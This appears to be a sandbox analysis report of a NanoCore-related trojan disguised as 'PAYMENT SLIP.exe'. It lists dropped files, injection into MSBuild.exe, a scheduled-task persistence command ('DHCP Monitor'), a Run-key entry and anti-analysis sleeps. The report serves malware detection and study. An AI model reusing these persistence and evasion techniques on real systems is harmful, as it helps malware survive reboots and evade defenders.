        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: MSBuild.exe, 00000011.00000002.714864522.0000000002E71000.00000004.00000001.sdmpBinary or memory string: *.sln
        Source: classification engineClassification label: mal100.troj.evad.winEXE@26/31@17/1
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_004035D8
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,8_2_004035D8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_057D12EA AdjustTokenPrivileges,12_2_057D12EA
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_057D12B3 AdjustTokenPrivileges,12_2_057D12B3
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_00404983 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404983
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_004021A2 CoCreateInstance,1_2_004021A2
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeFile created: C:\Users\user\AppData\Roaming\tteegmiuoefs
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{c473d7c4-8173-4cff-8fb5-dfc81a12600f}
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_01
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeFile created: C:\Users\user\AppData\Local\Temp\nsmD248.tmp
        Source: PAYMENT SLIP.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeFile read: C:\Users\user\Desktop\PAYMENT SLIP.exeJump to behavior
        Source: unknown Process created: C:\Users\user\Desktop\PAYMENT SLIP.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe'
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe'
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exe Process created: C:\Users\user\Desktop\PAYMENT SLIP.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe'
        Source: unknown Process created: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe'
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe'
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp3E70.tmp'
        Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
        Source: PAYMENT SLIP.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: C:\Windows\System.pdboo source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: indows\symbols\dll\System.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\dll\System.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: wntdll.pdbUGP source: PAYMENT SLIP.exe, 00000001.00000003.657311903.0000000003210000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 00000006.00000003.682894509.00000000031A0000.00000004.00000001.sdmp, hmhrpib.exe, 00000008.00000003.698726945.0000000002FB0000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 0000000A.00000003.710544371.00000000032C0000.00000004.00000001.sdmp, hmhrpib.exe, 0000000D.00000003.715127820.0000000002F70000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 00000014.00000003.735577807.0000000003090000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb* source: MSBuild.exe, 0000000C.00000003.887823042.0000000001658000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: MSBuild.exe, 0000000C.00000002.910378079.00000000017A0000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: PAYMENT SLIP.exe, 00000001.00000003.657311903.0000000003210000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 00000006.00000003.682894509.00000000031A0000.00000004.00000001.sdmp, hmhrpib.exe, 00000008.00000003.698726945.0000000002FB0000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 0000000A.00000003.710544371.00000000032C0000.00000004.00000001.sdmp, hmhrpib.exe, 0000000D.00000003.715127820.0000000002F70000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 00000014.00000003.735577807.0000000003090000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: MSBuild.exe, 0000000C.00000002.911646592.000000000485A000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp
        Source: Binary string: indows\System.pdbpdbtem.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp
        Source: Binary string: System.pdbX source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp
        Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: MSBuild.exe, 0000000C.00000002.913261020.0000000005DA0000.00000002.00000001.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: MSBuild.exe, 0000000C.00000002.910417181.00000000017D0000.00000004.00000001.sdmp

        Data Obfuscation:

        .NET source code contains potential unpacker
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Code function: 12_2_014C74AC push ecx; ret 12_2_014C74AD
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Code function: 12_2_014C74B8 push ebp; ret 12_2_014C74B9
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Code function: 12_2_014C9D58 pushad ; retf 12_2_014C9D59
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Code function: 12_2_014C9D54 push eax; retf 12_2_014C9D55
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Code function: 12_2_014C5CE6 push 00000005h; iretd 12_2_014C5CE8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Code function: 12_2_06CD0E48 push ebx; retf 12_2_06CD0EB2
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exe File created: C:\Users\user\AppData\Local\Temp\nsz6311.tmp\qm1tw12xr.dll (dropped file)
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exe File created: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe (dropped file)
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exe File created: C:\Users\user\AppData\Local\Temp\nsy2D8A.tmp\qm1tw12xr.dll (dropped file)
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe File created: C:\Users\user\AppData\Local\Temp\nsj3D87.tmp\qm1tw12xr.dll (dropped file)
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exe File created: C:\Users\user\AppData\Local\Temp\nsiFB00.tmp\qm1tw12xr.dll (dropped file)
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe File created: C:\Users\user\AppData\Local\Temp\nsb1C63.tmp\qm1tw12xr.dll (dropped file)
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exe File created: C:\Users\user\AppData\Local\Temp\nshD279.tmp\qm1tw12xr.dll (dropped file)

        Boot Survival:

        Uses schtasks.exe or at.exe to add and modify task schedules
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp3E70.tmp'
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jnckjcfx

        Hooking and other Techniques for Hiding and Protection:

        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe:Zone.Identifier read attributes | delete
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWindow / User API: foregroundWindowGot 755Jump to behavior
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe TID: 6140Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6524Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6652Thread sleep time: -340000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe TID: 6348Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6956Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7000Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7048Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C4E
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_0040689A FindFirstFileW,FindClose,1_2_0040689A
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_00402902 FindFirstFileW,1_2_00402902
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_00405C4E
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_0040689A FindFirstFileW,FindClose,8_2_0040689A
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_00402902 FindFirstFileW,8_2_00402902
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_057D1012 GetSystemInfo,12_2_057D1012
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeThread delayed: delay time: 30000Jump to behavior
        Source: MSBuild.exe, 0000000C.00000002.913661649.0000000006050000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: MSBuild.exe, 0000000C.00000002.913661649.0000000006050000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: MSBuild.exe, 0000000C.00000002.913661649.0000000006050000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: MSBuild.exe, 0000000C.00000002.910250249.000000000160F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: MSBuild.exe, 0000000C.00000002.913661649.0000000006050000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_10001000 mov eax, dword ptr fs:[00000030h]1_2_10001000
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_10001110 mov eax, dword ptr fs:[00000030h]1_2_10001110
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_00B1218C mov eax, dword ptr fs:[00000030h]1_2_00B1218C
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_00B12451 mov eax, dword ptr fs:[00000030h]1_2_00B12451
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 6_2_0305218C mov eax, dword ptr fs:[00000030h]6_2_0305218C
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 6_2_03052451 mov eax, dword ptr fs:[00000030h]6_2_03052451
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_02F1218C mov eax, dword ptr fs:[00000030h]8_2_02F1218C
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_02F12451 mov eax, dword ptr fs:[00000030h]8_2_02F12451
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 10_2_023A2451 mov eax, dword ptr fs:[00000030h]10_2_023A2451
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 10_2_023A218C mov eax, dword ptr fs:[00000030h]10_2_023A218C
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 13_2_02F12451 mov eax, dword ptr fs:[00000030h]13_2_02F12451
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 13_2_02F1218C mov eax, dword ptr fs:[00000030h]13_2_02F1218C
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 20_2_022B218C mov eax, dword ptr fs:[00000030h]20_2_022B218C
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 20_2_022B2451 mov eax, dword ptr fs:[00000030h]20_2_022B2451
